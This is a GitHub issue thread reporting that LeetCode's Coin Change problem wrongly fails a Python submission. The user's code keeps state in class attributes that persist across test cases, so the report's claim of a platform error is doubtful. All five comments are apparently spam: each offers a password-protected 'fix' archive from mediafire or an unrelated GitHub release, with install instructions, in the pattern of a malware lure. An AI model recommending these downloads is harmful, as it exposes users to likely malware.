### ISSUE TITLE
[BUG] - 322. Coin Change is wrongly reporting UnitTest case failure 

### ISSUE THREAD

**Issue by phalli** [LeetCode-Feedback/LeetCode-Feedback#23622]
### LeetCode Username

phalli

### Problem Number, Title, and Link

322, Coin Change, https://leetcode.com/problems/coin-change/description/

### Bug Category

Incorrect test case *(Output of test case is incorrect as per the problem statement)*

### Bug Description

https://leetcode.com/problems/coin-change/submissions/1363789676

When locally run my code gives the correct o/p. Where as while I submit, it reports failure. 

### Language Used for Code

Python/Python3

### Code used for Submit/Run operation

```bash
class Solution:
    minSoFar = 0
    alreadyComputedSubTree = {}
    def coinChange(self, coins: list[int], amount: int) -> int:
        if amount == 0:
            return 0
        self.minSoFar = amount+1
        for coin in coins:
            self.coinChangeHelper(coin, coins, amount,0)
        if self.minSoFar != amount+1:
            return self.minSoFar
        else:
            return -1

    def coinChangeHelper(self, coin:int, coins: list[int], amount: int, pathLen:int) -> bool:
        if amount - coin < 0:
            return
        if amount in self.alreadyComputedSubTree:
            if pathLen + self.alreadyComputedSubTree[amount] < self.minSoFar:
                self.minSoFar = pathLen + self.alreadyComputedSubTree[amount]
                return
        pathLen += 1
        if amount - coin == 0:
            if pathLen < self.minSoFar:
                self.minSoFar = pathLen
                self.alreadyComputedSubTree[amount] = pathLen
                return
        for c in coins:
            minSubTree = self.coinChangeHelper(c,coins, amount-coin,pathLen)
        amount -= coin
        return
```

### Expected behavior

Coins [1,3] Amount: 2 Expected 2 Got 1
Where as the code I submitted does give 2.
Coins [1,3] Amount: 2 Expected 2 Got 2

Wrong reporting as a failed testcase.

### Screenshots

![image](https://github.com/user-attachments/assets/f3ddbefd-fd67-4f8b-9ff7-758ed9e38260)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
